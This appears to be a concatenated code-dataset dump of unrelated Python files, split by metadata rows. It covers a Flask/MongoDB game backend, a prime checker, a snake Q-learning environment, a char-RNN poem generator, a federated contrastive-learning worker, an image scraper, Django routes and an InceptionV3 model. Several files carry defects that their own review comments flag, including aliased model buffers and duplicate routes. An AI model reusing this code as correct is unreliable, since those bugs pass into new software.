    return user_collection.find_one({'username': username})
def update_password(username, password):
    """Set a new password for *username*.

    Uses a partial ``$set`` on the password field only, leaving the user's
    win/loss/draw stats untouched.  This avoids the read-modify-write race
    of the previous implementation, which fetched the whole document and
    rewrote every field (stat updates landing in between were lost).
    """
    user_collection.update_one({'username': username},
                               {'$set': {'password': password}})
# add a win, loss or draw to the user's stats and refresh their score
def update_player_stats(username: str, stat_to_change: str, increment: int):
    """Add *increment* to one of the user's counters and refresh their
    leaderboard score.

    :param username: the user whose record is updated
    :param stat_to_change: one of 'wins', 'loss' or 'draw'; anything else
        leaves the counters unchanged (the record is still rewritten)
    :param increment: amount added to the chosen counter
    """
    record = user_collection.find_one({'username': username})
    wins = record['wins']
    loss = record['loss']
    draws = record['draw']
    if stat_to_change == 'wins':
        wins += increment
    elif stat_to_change == 'loss':
        loss += increment
    elif stat_to_change == 'draw':
        draws += increment
    # NOTE(review): read-modify-write; a $inc update would be atomic.
    new_record = {'$set': {'username': username, 'wins': wins, 'loss': loss, 'draw': draws}}
    user_collection.update_one({'username': username}, new_record)
    update_leaderboard(record['username'])
# change users score to {'username' : username, 'score' : new_score}... or insert if not there
# score will be an integer that ranks the player based on # games played and W/L ratio
def update_leaderboard(username):
    """Recompute and store the leaderboard score for *username*.

    Score = games_played * (wins - loss) when the win/loss difference is
    positive, otherwise games_played * 0.5, so active players rank above
    inactive ones even with poor records.
    """
    user = user_collection.find_one({'username': username})
    # Scan the leaderboard for this user's current score; each document is
    # a single {username: score} pair, so popitem() extracts it.
    old_record = leaderboard.find({})
    old_score = None
    for record in old_record:
        data = record.popitem()
        if data[0] == user['username']:
            old_score = data[1]
    # NOTE(review): if the user has no leaderboard document, old_score stays
    # None and the update_one filter below matches nothing — confirm every
    # user is seeded via add_user before this runs.
    games_played = user['wins'] + user['loss']
    win_loss = user['wins'] - user['loss']
    new_score = 0
    if win_loss > 0:
        new_score = games_played * win_loss
    else:
        new_score = games_played * 0.5
    new_record = {'$set': {user['username']: new_score}}
    leaderboard.update_one({user['username']: old_score}, new_record)
# returns a dictionary of form {rank : [score, username]}
def get_leaderboard():
    """Return the leaderboard as {rank: [score, username]}, rank 1 highest.

    Scores are read from the leaderboard collection (one {username: score}
    document per user), cast to int, sorted ascending, then numbered from
    the bottom so the largest score receives rank 1.
    """
    records = leaderboard.find({})
    record_list = []
    # add all the users to a List of List to be sorted by score
    for record in records:
        item = record.popitem()
        username = item[0]
        score = int(item[1])
        record_list.append([score, username])
    sorted_list = sorted(record_list, key=itemgetter(0))
    return_leaderboard = {}
    # Walk the ascending list while counting the rank down, so the last
    # (highest-score) entry ends up with rank 1.
    rank = len(record_list)
    for user in sorted_list:
        return_leaderboard[rank] = user
        rank -= 1
    return return_leaderboard
def drop(collection):
    """Remove *collection* and all of its documents from the database."""
    collection.drop()
def assign_room(username, room):
    """Record that *username* is now in *room*, replacing any previous
    assignment (upsert-by-hand via get_users_room)."""
    record = {'username': username, 'room': room}
    if get_users_room(username) is not None:
        rooms_collection.update_one({'username': username}, {"$set": record})
    else:
        rooms_collection.insert_one(record)
def get_users_room(username):
    """Return the room document for *username*, or None if unassigned."""
    return rooms_collection.find_one({'username': username})
def delete_rooms():
    """Clear every room assignment (e.g. on server restart)."""
    rooms_collection.delete_many({})
def create_lobby(lobby, username):
    """Open a new lobby named *lobby* with *username* as its first player."""
    lobby_collection.insert_one({'lobby': lobby, 'user1': username})
def get_lobbies():
    """Return the names of all currently open lobbies.

    Replaces the manual accumulate-with-append loop with a list
    comprehension over the cursor; behaviour is unchanged (missing 'lobby'
    keys still yield None, as .get did before).
    """
    return [doc.get('lobby') for doc in lobby_collection.find({})]
def get_lobby(username):
    """Return the lobby document created by *username*, or None."""
    return lobby_collection.find_one({'user1': username})
def delete_lobby(lobby):
    """Close the lobby named *lobby*."""
    lobby_collection.delete_one({'lobby': lobby})
def delete_lobbies():
    """Close every open lobby."""
    lobby_collection.delete_many({})
| rickyjorgensen2000/cse312 | flaskr/db.py | db.py | py | 4,316 | python | en | code | 0 | github-code | 36 |
# Read the number to test for primality from the user.
numero = int(input('Digite um número para testar se é primo: '))
def e_primo(n):
    """Return True if *n* is a prime number, False otherwise.

    Trial division only needs to test divisors up to sqrt(n): any factor
    larger than sqrt(n) is paired with one smaller than it.  This replaces
    the original O(n) scan that counted down from n // 2, giving the same
    results for every input in O(sqrt(n)) time.
    """
    if n < 2:
        # 0, 1 and negatives are not prime by definition.
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True
def imprimir_resultado(n):
    """Print (in Portuguese) whether *n* is prime, delegating to e_primo."""
    if e_primo(n):
        print(f'O número {n} é primo')
    else:
        print(f'O número {n} não é primo')
imprimir_resultado(numero) | Medeiros000/Estacio_estudo | Estudo_Python/Alura/Basico/Modulo_03/Teste_14_Primo.py | Teste_14_Primo.py | py | 396 | python | pt | code | 0 | github-code | 36 |
36627702709 | import random
import numpy as np
import pickle
# a copy of visualsnake.py but without the PyGame
class LearnSnake:
    """Headless snake environment for Q-learning.

    Mirrors the PyGame version but without rendering.  The board is a
    (rows, cols) numpy grid where 0 = empty, 1 = snake body, 2 = food.
    """
    def __init__(self):
        # Screen geometry in pixels; the grid is screen size / snake_size.
        self.screen_width = 600
        self.screen_height = 400
        self.snake_size = 10
        self.snake_speed = 15
        self.snake_coords = []
        self.snake_length = 1
        self.dir = "right"
        self.board = np.zeros((self.screen_height // self.snake_size, self.screen_width // self.snake_size))
        self.game_close = False
        # Start the snake at the centre of the screen.
        self.x1 = self.screen_width / 2
        self.y1 = self.screen_height / 2
        self.r1, self.c1 = self.coords_to_index(self.x1, self.y1)
        self.board[self.r1][self.c1] = 1
        # Initial movement: one column to the right per step.
        self.c_change = 1
        self.r_change = 0
        self.food_r, self.food_c = self.generate_food()
        self.board[self.food_r][self.food_c] = 2
        self.survived = 0
        self.step()
    def get_state(self):
        """Return the 12-flag observation tuple used as a Q-table key.

        Layout: 4 one-hot direction flags, 4 food-relative-position flags
        (food above/below/left/right of the head) and 4 danger flags for
        the cells adjacent to the head.
        """
        head_r, head_c = self.snake_coords[-1]
        state = []
        state.append(int(self.dir == "left"))
        state.append(int(self.dir == "right"))
        state.append(int(self.dir == "up"))
        state.append(int(self.dir == "down"))
        state.append(int(self.food_r < head_r))
        state.append(int(self.food_r > head_r))
        state.append(int(self.food_c < head_c))
        state.append(int(self.food_c > head_c))
        state.append(self.is_unsafe(head_r + 1, head_c))
        state.append(self.is_unsafe(head_r - 1, head_c))
        state.append(self.is_unsafe(head_r, head_c + 1))
        state.append(self.is_unsafe(head_r, head_c - 1))
        return tuple(state)
    def is_unsafe(self, r, c):
        """Return 1 if cell (r, c) is off the board or holds snake body."""
        if self.valid_index(r, c):
            if self.board[r][c] == 1:
                return 1
            return 0
        else:
            return 1
    def get_dist(self, r1, c1, r2, c2):
        """Euclidean distance between two grid cells (unused in this class)."""
        return ((r2 - r1) ** 2 + (c2 - c1) ** 2) ** 0.5
    def valid_index(self, r, c):
        """Return True if (r, c) lies inside the board."""
        return 0 <= r < len(self.board) and 0 <= c < len(self.board[0])
    def coords_to_index(self, x, y):
        """Convert pixel coordinates to a (row, col) grid index."""
        r = int(y // 10)
        c = int(x // 10)
        return (r, c)
    def generate_food(self):
        """Pick a random cell for the food, retrying until it is empty."""
        food_c = int(round(random.randrange(0, self.screen_width - self.snake_size) / 10.0))
        food_r = int(round(random.randrange(0, self.screen_height - self.snake_size) / 10.0))
        if self.board[food_r][food_c] != 0:
            food_r, food_c = self.generate_food()
        return food_r, food_c
    def game_over(self):
        """Return True once the snake has died."""
        return self.game_close
    def step(self, action="None"):
        """Advance the game one tick.

        :param action: index 0-3 into [left, right, up, down]; a random
            direction is chosen when no action is given.
        :return: (state, reward, done) — reward is +1 for eating food,
            -10 on death and 0 otherwise.
        """
        if action == "None":
            action = random.choice(["left", "right", "up", "down"])
        else:
            action = ["left", "right", "up", "down"][action]
        reward = 0
        # A move opposite to the current direction is only allowed for a
        # length-1 snake (a longer one cannot reverse into itself).
        if action == "left" and (self.dir != "right" or self.snake_length == 1):
            self.c_change = -1
            self.r_change = 0
            self.dir = "left"
        elif action == "right" and (self.dir != "left" or self.snake_length == 1):
            self.c_change = 1
            self.r_change = 0
            self.dir = "right"
        elif action == "up" and (self.dir != "down" or self.snake_length == 1):
            self.r_change = -1
            self.c_change = 0
            self.dir = "up"
        elif action == "down" and (self.dir != "up" or self.snake_length == 1):
            self.r_change = 1
            self.c_change = 0
            self.dir = "down"
        # Death by leaving the board.
        if self.c1 >= self.screen_width // self.snake_size or self.c1 < 0 or self.r1 >= self.screen_height // self.snake_size or self.r1 < 0:
            self.game_close = True
        self.c1 += self.c_change
        self.r1 += self.r_change
        self.snake_coords.append((self.r1, self.c1))
        if self.valid_index(self.r1, self.c1):
            self.board[self.r1][self.c1] = 1
        if len(self.snake_coords) > self.snake_length:
            # Drop the tail cell unless the snake just grew.
            rd, cd = self.snake_coords[0]
            del self.snake_coords[0]
            if self.valid_index(rd, cd):
                self.board[rd][cd] = 0
        for r, c in self.snake_coords[:-1]:
            if r == self.r1 and c == self.c1:
                # Head ran into the body.
                self.game_close = True
        if self.c1 == self.food_c and self.r1 == self.food_r:
            self.food_r, self.food_c = self.generate_food()
            self.board[self.food_r][self.food_c] = 2
            self.snake_length += 1
            reward = 1 # food eaten, so +1 reward
        else:
            rh1, ch1 = self.snake_coords[-1]
            if len(self.snake_coords) == 1:
                rh2, ch2 = rh1, ch1
            else:
                # NOTE(review): re-reads index [-1], so rh2/ch2 always equal
                # rh1/ch1; [-2] looks intended.  The values are unused
                # below, so behaviour is unaffected — confirm and clean up.
                rh2, ch2 = self.snake_coords[-1]
            # death = -10 reward
            if self.game_close:
                reward = -10
        self.survived += 1
        return self.get_state(), reward, self.game_close
    # run game using given episode (from saved q tables)
    # no visual - just returns snake length
    def run_game(self, episode):
        """Replay the game greedily using the Q-table saved for *episode*.

        :return: final snake length; aborts after 1000 steps with no food
            eaten to avoid infinite loops.
        """
        filename = f"pickle/{episode}.pickle"
        with open(filename, 'rb') as file:
            table = pickle.load(file)
        current_length = 2
        steps_unchanged = 0
        while not self.game_over():
            state = self.get_state()
            action = np.argmax(table[state])
            if steps_unchanged == 1000:
                break
            self.step(action)
            if self.snake_length != current_length:
                steps_unchanged = 0
                current_length = self.snake_length
            else:
                steps_unchanged += 1
        return self.snake_length
| techtribeyt/snake-q-learning | snake_no_visual.py | snake_no_visual.py | py | 5,834 | python | en | code | 1 | github-code | 36 |
29573142583 | import tensorflow as tf
from model import char_rnn
from utils import build_dataset
import numpy as np
# Special tokens the corpus wraps each poem with during training.
start_token = 'B'
end_token = 'E'
# Checkpoint directory and training corpus location.
model_dir = 'result/poem'
corpus_file = 'data/poems.txt'
# Learning rate (must match the one used to build the training graph).
lr = 0.0002
def to_word(predict, vocabs):
    """Sample one character from the model's output distribution.

    :param predict: batch of probabilities/weights; only row 0 is used and
        it is normalised in place before sampling.
    :param vocabs: sequence of vocabulary characters.
    :return: the sampled character; any out-of-range index maps to the
        last vocabulary entry.
    """
    predict = predict[0]
    predict /= np.sum(predict)
    sample = np.random.choice(np.arange(len(predict)), p=predict)
    # Off-by-one fix: the old `sample > len(vocabs)` let sample ==
    # len(vocabs) fall through to vocabs[sample] and raise IndexError when
    # the distribution is longer than the vocabulary.  `>=` clamps every
    # out-of-range index to the final entry instead.
    if sample >= len(vocabs):
        return vocabs[-1]
    return vocabs[sample]
def gen_poem(begin_word):
    """Generate one poem with the trained char-RNN.

    Restores the latest checkpoint from ``model_dir``, primes the network
    with the start token, then samples characters one at a time until the
    end token appears or 24 characters have been produced.

    Args:
        begin_word: optional first character; when falsy, the first
            character is sampled from the model instead.

    Returns:
        The generated poem as a single string (without start/end tokens).
    """
    batch_size = 1
    print('## loading corpus from %s' % model_dir)
    poems_vector, word_int_map, vocabularies = build_dataset(corpus_file)
    # Placeholder for one sequence of token ids at a time.
    input_data = tf.placeholder(tf.int32, [batch_size, None])
    # NOTE(review): char_rnn is given batch_size=64 while the placeholder above
    # uses batch_size=1 -- confirm char_rnn ignores its batch_size argument
    # when output_data is None (inference mode).
    end_points = char_rnn(model='lstm', input_data=input_data, output_data=None, vocab_size=len(
        vocabularies), rnn_size=128, num_layers=2, batch_size=64, learning_rate=lr)
    saver = tf.train.Saver(tf.global_variables())
    init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())
    with tf.Session() as sess:
        sess.run(init_op)
        # Restore the most recent training checkpoint.
        checkpoint = tf.train.latest_checkpoint(model_dir)
        saver.restore(sess, checkpoint)
        # Feed the start token to obtain the initial prediction and RNN state.
        x = np.array([list(map(word_int_map.get, start_token))])
        [predict, last_state] = sess.run([end_points['prediction'], end_points['last_state']],
                                         feed_dict={input_data: x})
        if begin_word:
            word = begin_word
        else:
            word = to_word(predict, vocabularies)
        poem_ = ''
        i = 0
        # Sample until the end token, capping output at 24 characters.
        while word != end_token:
            poem_ += word
            i += 1
            if i >= 24:
                break
            # Feed the last sampled character back in, carrying the RNN state.
            x = np.zeros((1, 1))
            x[0, 0] = word_int_map[word]
            [predict, last_state] = sess.run([end_points['prediction'], end_points['last_state']],
                                             feed_dict={input_data: x, end_points['initial_state']: last_state})
            word = to_word(predict, vocabularies)
    return poem_
def pretty_print_poem(poem_):
    """Print the poem one sentence per line.

    The string is split on the Chinese full stop '。'; only fragments longer
    than 10 characters are printed (shorter ones are dropped as noise), each
    with its terminating '。' restored.
    """
    for sentence in poem_.split('。'):
        if len(sentence) <= 10:
            continue
        print(sentence + '。')
if __name__ == '__main__':
    # Interactive entry point: ask for a seed character, generate, then
    # pretty-print the resulting poem.
    begin_char = input('## please input the first character:')
    poem = gen_poem(begin_char)
    pretty_print_poem(poem_=poem)
15856967243 | from .worker import *
class WorkerMoon(Worker):
    """Federated-learning worker with a model-contrastive auxiliary loss.

    Extends the base ``Worker`` with a buffer of historical local models
    received from the master and an extra contrastive term added during
    local training (presumably MOON, "Model-Contrastive Federated
    Learning" -- TODO confirm against the project docs).
    """
    def __init__(self, conf):
        super().__init__(conf)
    def prepare_train(self):
        # Base preparation, then move every buffered historical model onto
        # this worker's device so the contrastive term can be computed.
        self._prepare_train()
        for i in range(self.models_buffer_len):
            self.models_buffer[i].to(self.device)
    def listen_to_master(self):
        """Receive the activation message from the master and set up local state.

        Decodes client id, communication round, number of local epochs and the
        history-buffer length from the broadcast tensor, then builds the model,
        metrics, previous-model buffers and the local data loader.
        """
        # listen to master, related to the function `_activate_selected_clients` in `master.py`.
        msg = torch.zeros((4, self.conf.n_participated))
        dist.broadcast(tensor=msg, src=0)
        # Rows 0..2 of this worker's column: client id, round, local epochs.
        self.conf.graph.client_id, self.conf.graph.comm_round, self.n_local_epochs = (
            msg[:3, self.conf.graph.rank - 1].to(int).cpu().numpy().tolist()
        )
        # once we receive the signal, we init for the local training.
        self.arch, self.model = create_model.define_model(
            self.conf, to_consistent_model=False, client_id=self.conf.graph.client_id
        )
        self.model_state_dict = self.model.state_dict()
        # Flat tensor view of the model parameters, used for dist transfers.
        self.model_tb = TensorBuffer(list(self.model_state_dict.values()))
        # Row 3 carries how many historical models the master will send.
        self.models_buffer_len = msg[3][self.conf.graph.rank - 1].to(int).cpu().numpy().tolist()
        self.metrics = create_metrics.Metrics(self.model, task="classification")
        # Frozen CPU copy of the freshly received model, used as a template.
        prev_model = copy.deepcopy(self.model).cpu()
        self.prev_model = self._turn_off_grad(prev_model)
        self.buffer_model_dicts = [self.prev_model.state_dict() for _ in range(self.models_buffer_len)]
        self.buffer_model_tbs = [TensorBuffer(list(self.buffer_model_dicts[i].values())) for i in
                                 range(self.models_buffer_len)]
        # NOTE(review): every entry below aliases the SAME `self.prev_model`
        # object (and each state_dict() above shares that model's tensors), so
        # loading different received weights into models_buffer[i] in
        # recv_extra_info_from_master overwrites one shared module repeatedly.
        # Verify whether per-slot deep copies were intended here.
        self.models_buffer = [self.prev_model for _ in range(self.models_buffer_len)]
        dist.barrier()
        self.train_loader, _ = create_dataset.define_data_loader(
            self.conf,
            dataset=self.dataset["train"],
            # localdata_id start from 0 to the # of clients - 1.
            # client_id starts from 1 to the # of clients.
            localdata_id=self.conf.graph.client_id - 1,
            is_train=True,
            data_partitioner=self.data_partitioner,
        )
    def recv_extra_info_from_master(self):
        """Receive the buffered historical local models from the master."""
        for i in range(self.models_buffer_len):
            # Fill the i-th flat buffer, then unpack it into the i-th model.
            dist.recv(self.buffer_model_tbs[i].buffer, src=0)
            self.buffer_model_tbs[i].unpack(self.buffer_model_dicts[i].values())
            self.models_buffer[i].load_state_dict(self.buffer_model_dicts[i])
            self.models_buffer[i] = self.models_buffer[i].to(self.device)
            self.conf.logger.log(
                f"Worker-{self.conf.graph.worker_id} (client-{self.conf.graph.client_id}) received the historical local model ({self.arch}) from Master."
            )
        dist.barrier()
    def local_training_with_extra_calculate(self, loss, output, data_batch, feature):
        """Add the model-contrastive regularization term to *loss*.

        Skipped when the distillation coefficient is zero or during the first
        communication round. Otherwise builds an InfoNCE-style logit row per
        sample: the positive is the similarity to the features of the model
        received at round start, the negatives are similarities to the
        buffered historical models.
        """
        if self.conf.distillation_coefficient == 0 or self.conf.graph.comm_round <= 1:
            return loss
        bsz = data_batch["target"].size(0)
        # NOTE(review): assumes self.init_model holds the round-start (global)
        # model acting as the positive anchor -- confirm in the base Worker.
        teacher_feature, _ = self.init_model(data_batch["input"])
        logits = self.similarity(feature, teacher_feature.detach()).reshape(-1, 1)
        for i in range(self.models_buffer_len):
            prev_feature, _ = self.models_buffer[i](data_batch["input"])
            nega = self.similarity(feature, prev_feature.detach()).reshape(-1, 1)
            logits = torch.cat((logits, nega), dim=1)
        # Subtract the per-row max for numerical stability, then temperature-scale.
        logits_max, _ = torch.max(logits, dim=1, keepdim=True)
        logits = logits - logits_max.detach()
        logits /= self.conf.temperature
        # The positive similarity sits in column 0, so the target class is 0.
        labels = torch.zeros(bsz).to(self.device).long()
        loss2 = self.conf.distillation_coefficient * self.criterion(logits, labels)
        loss = loss + loss2
        if self.tracker is not None:
            self.tracker.update_local_metrics(
                loss2.item(), -1, n_samples=bsz
            )
        return loss
    def similarity(self, x1, x2):
        # Cosine similarity along the last (feature) dimension.
        sim = F.cosine_similarity(x1, x2, dim=-1)
        return sim
| CGCL-codes/FedGKD | pcode/workers/worker_moon.py | worker_moon.py | py | 4,105 | python | en | code | 5 | github-code | 36 |
24347774605 | import requests as req
from lxml import html
from tqdm import tqdm
# Page to scrape; every <img src> found on it is a download candidate.
url = 'http://swf.com.tw/scrap/'
page = req.get(url)
dom = html.fromstring(page.text)
images = dom.xpath('//img/@src')  # src attribute of every <img> element
def download(url):
    """Stream the file at *url* into the current directory.

    The local filename is the last path component of the URL. A progress
    bar is shown while 1 KiB chunks are written.

    Returns:
        The local filename the content was saved under.
    """
    filename = url.split('/')[-1]
    # Fix: use the response as a context manager so the streamed connection
    # is released even if writing fails (it was previously never closed).
    with req.get(url, stream=True) as r:
        with open(filename, 'wb') as f:
            for data in tqdm(r.iter_content(1024)):
                f.write(data)
    return filename
# Download every discovered image, skipping non-image or failing URLs.
for img in images:
    if not img.startswith('http'):
        img = url + img  # resolve a relative src against the page URL
    h = req.head(img)
    MIME = h.headers['content-type']
    # Confirm the response is OK and actually an image before downloading.
    if (h.status_code == 200) and ('image' in MIME):
        print('下載檔案網址:' + img)
        filename = download(img)
        print(filename + ' 檔案下載完畢!')
13840387121 | from django.contrib import admin
from django.urls import path, include
from . import views
# URL routes for the app.
# NOTE(review): several routes share an identical path string (two 'affiche/',
# two 'traitement/', two 'update/<int:id>', two 'traitementupdate/<int:id>').
# Django resolves the FIRST match, so the later duplicate of each pair is
# unreachable by URL and only usable via reverse()-by-name -- confirm intended.
urlpatterns = [
    path('joueur/',views.joueur, name="Joueur"),
    path('club/',views.club,name="Club"),
    path('player/',views.player,name="Player"),
    path('',views.home, name="Home"),
    path('affiche/',views.affiche_club, name="Affiche_club"),
    path('affiche/',views.affiche_joueur, name="Affiche_joueur"),
    path("affiche/<int:id>/",views.affiche_club),
    path("affiche/<int:id>/",views.affiche_joueur),
    path("traitement/", views.traitement_club, name="Traitement_club"),
    path("traitement/", views.traitement_joueur, name="Traitement_joueur"),
    # NOTE(review): Django route strings should not start with '/'; as written
    # this only matches a double-slash URL. Probably meant "delete/<int:id>".
    path("/delete/<int:id>",views.delete_club, name="Delete_club"),
    path("delete/<int:id>",views.delete_joueur, name="Delete_joueur"),
    path("update/<int:id>",views.update_joueur, name="Update_joueur"),
    path("update/<int:id>",views.update_club, name="Update_club"),
    path("traitementupdate/<int:id>",views.traitementupdate_joueur, name="Traitementupdate_joueur"),
    path("traitementupdate/<int:id>",views.traitementupdate_club, name="Traitementupdate_club"),
    path('admin/', admin.site.urls),
]
| 2bFaycal/projet-django | foot/app/urls.py | urls.py | py | 1,182 | python | fr | code | 0 | github-code | 36 |
7043720148 | from keras.applications.inception_v3 import InceptionV3
from tensorflow.keras import layers, models, optimizers
INPUT_SHAPE_300_300 = (300, 300, 3)
def create_model(input_shape=INPUT_SHAPE_300_300, weights=None):
    """Build a 6-class classifier on top of a frozen InceptionV3 base.

    Args:
        input_shape: (height, width, channels) of the input images.
        weights: optional path to an InceptionV3 weight file; when None,
            ImageNet weights are downloaded instead.

    Returns:
        A compiled Sequential model (categorical cross-entropy, Nadam).
    """
    if weights is not None:
        inception_base = InceptionV3(
            weights=None, include_top=False, input_shape=input_shape
        )
        inception_base.load_weights(weights)
    else:
        inception_base = InceptionV3(
            weights="imagenet", include_top=False, input_shape=input_shape
        )
    # Freeze the base so only the new classification head is trained.
    inception_base.trainable = False
    model = models.Sequential(
        [
            inception_base,
            layers.GlobalAveragePooling2D(),
            layers.Dropout(0.3),
            layers.Dense(1024, activation="relu"),
            layers.Dropout(0.3),
            layers.Dense(6, activation="softmax"),
        ]
    )
    model.compile(
        loss="categorical_crossentropy",
        # Fix: tf.keras exposes the optimizer as the class `Nadam` (there is
        # no lowercase `nadam` factory), and `lr` is the deprecated alias of
        # `learning_rate`.
        optimizer=optimizers.Nadam(learning_rate=0.001),
        metrics=["accuracy"],
    )
    return model
| SalmanRafiullah/garbage-classification | models/inception_v3.py | inception_v3.py | py | 1,034 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.